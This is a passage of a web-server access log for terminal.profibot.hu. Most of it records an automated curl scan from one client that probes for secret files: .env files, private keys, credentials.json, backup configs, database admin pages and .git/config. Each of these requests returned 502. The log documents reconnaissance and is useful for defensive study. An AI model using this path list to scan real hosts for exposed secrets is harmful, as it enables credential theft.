web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/public.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:18 +0000] - - 502 - GET https terminal.profibot.hu "/ssl.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/cert.pem" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/selfsigned.crt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/selfsigned.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/nginx.conf" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/httpd.conf" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/docker-compose.override.yml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/Dockerfile" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/.nvmrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/.yarnrc" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/.rbenv-vars" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/config.ts" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/env.ts" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/settings.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/web.xml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/WEB-INF/web.xml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/META-INF/context.xml" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/settings.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/settings.ini" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/db.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/db.conf" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/sql.conf" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/.env.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/adminer.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/sqladmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/admin/phpmyadmin.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/private/secret.key" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/private/secret.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.txt" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/secrets.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/secret.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/api/secrets.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/config.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/.well-known/credentials.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/install.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/setup.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/setup-config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:19 +0000] - - 502 - GET https terminal.profibot.hu "/configuration.bak" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/app_dev.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/config_dev.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/index-dev.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/index-test.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/test/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/dev/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/dev/config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/maintenance.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/maintenance.html" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/under-construction.html" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/down.html" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/.maintenance" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/install/install.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/setup/setup.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/setup/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/upgrade.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/upgrade/index.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/upgrader.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/migrate.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/migration.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/console.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/install.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/db.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/scripts/deploy.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/env.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/.env.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/backup.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/test.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/debug.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/logs.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/deploy.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/init.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/install.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/uninstall.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/remove.sh" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/install.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/update.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:20 +0000] - - 502 - GET https terminal.profibot.hu "/delete.sql" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/sample.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/example.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/example-config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/sample-config.php" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/plugin-qiankun/examples/app2/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/wp-config.php~" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/e929402614901c2ef599d15bc501af6dfbba1f5d843a7a80a273082588eeea94/sobreloja/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/plugin-qiankun/examples/app1/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/frontend/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package-lock.json" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/7c2dd93aed15103586508689b0926f22cb22615eaa7027d6a140541577df9c26/ademypro/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/react-scripts/fixtures/kitchensink/template/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/app/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/048fa3053c370aea887f517323b190398c2fe523327c29711d24c2fe4c29fabc/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/api/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/81361875dcdb133893cbb29f77487781bd31d666647c61421b96dfa6e873787f/unicesumaradmissaodigital/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/af58896ce0256c58237b9bb2007f484e1439d89eeeda8499ab2488b301c046b3/petgenius/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/36b55042526fc51c735e1ac51f845e93c8d813af2fb6ad5c92d6fbcb2a03b0c4/meu-ingresso-2023/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/plugin-qiankun/examples/app3/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/e5b1aee992cb23b01a4716f2ca28034d950c65a9e9d5e136bbede53863b86857/nextadelivery/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/052355b33aa284cc76967061007eac6fefae9d406040fa0cba0cae3b11173189/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/11530e64f1040d92633c20c26d4c19fe92c2d9a22fffc9631b6101840a55a101/niche-links/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/plugin-analytics/src/fixtures/analytics-ga-key/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/client/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/packages/plugin-qiankun/examples/master/.env" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/185fc49e7cbfb81d04d4e36e96846104f364cc4dcf202d9da8ef4f93547a646d/interpali/live/404/xnull/xfalse/xfalse/de_de/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/cf757dcb0590456003b71427e18f8d45aa0fbb53a193e37cb6beccf0db6c843e/xxpressio/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/8a82f8172ed0fda7dbe314b70738018ff4693e866d72fbffe6fbb2f476d1bba5/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/e313c55db568951985459b8dc72a601bb19d68a4d9e27bb8bec8988c6534528e/unicesumaradmissaodigital/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/48c889d4f074be3c11d2a9aa14999e5c81e431800b5d4350cfc8b530999f8f57/isystempro2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/2b53c5ae6721d896f729102fbb2fb0f35196a11f5124ad2b509705367f9be49c/jwmlog2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/a8d0dbecfae07a8db959506db9dc23249690674e7d34c9ff8fd0ada5a3c9ee54/meu-ingresso-2023/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/784245312a05d33ae694c74388342d13cd25c74fdb72c84a0b8f0c20fb1b9baf/thee-autoblogger/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/91bffd6b1bd42ff8acc67240c7a8b382e6c9639de98968c71d922e9248601390/crewlab-coachingtools/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/744aa7a9e0404e5ec9c1b3f4d4c2f063351d79e547f96be7c67518970f0bb51c/applypass/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/90a4f2e10656f9e1c80c0c66836218eead17a96e4dc8d49fb049fd00b90721ac/isystempro2/live/404/xnull/xfalse/xfalse/pt_br/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:14:24:21 +0000] - - 502 - GET https terminal.profibot.hu "/package/dynamic_js/2a3f09a40c9d3d29b51271b66fac894cdd514948311a82e82a458b43b4f8ff9b/applypass/live/404/xnull/xfalse/xfalse/en_us/xfalse/xfalse/dynamic.js" [Client 185.177.72.56] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:15:15:49 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 34.87.102.239] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[28/Jan/2026:15:15:50 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.87.102.239] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 12) Chrome/111.0 Mobile Safari/537.36" "-" +[28/Jan/2026:15:15:50 +0000] - - 301 - GET http terminal.profibot.hu "/wordpress/" [Client 34.87.102.239] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0" "-" +[28/Jan/2026:15:15:50 +0000] - - 502 - GET https terminal.profibot.hu "/wordpress/" [Client 34.87.102.239] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; Linux x86_64) Firefox/117.0" "-" +[28/Jan/2026:17:06:51 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 34.6.202.236] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (X11; openSUSE; Linux x86_64; rv:115.10.0) Gecko/20100101 Firefox/115.10.0" "-" +[28/Jan/2026:19:22:24 +0000] - - 502 - POST https terminal.profibot.hu "/" [Client 85.11.167.4] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://terminal.profibot.hu" +[28/Jan/2026:19:22:24 +0000] - - 502 - POST https terminal.profibot.hu "/" [Client 85.11.167.4] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://terminal.profibot.hu" +[28/Jan/2026:19:30:17 +0000] - - 502 - GET https terminal.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 8.1.0; CPH1823 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/manifest.json" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/_app/immutable/entry/app.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https terminal.profibot.hu "/static/js/5.chunk.js" [Client 216.81.248.22] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[28/Jan/2026:21:45:21 +0000] - - 502 - GET https 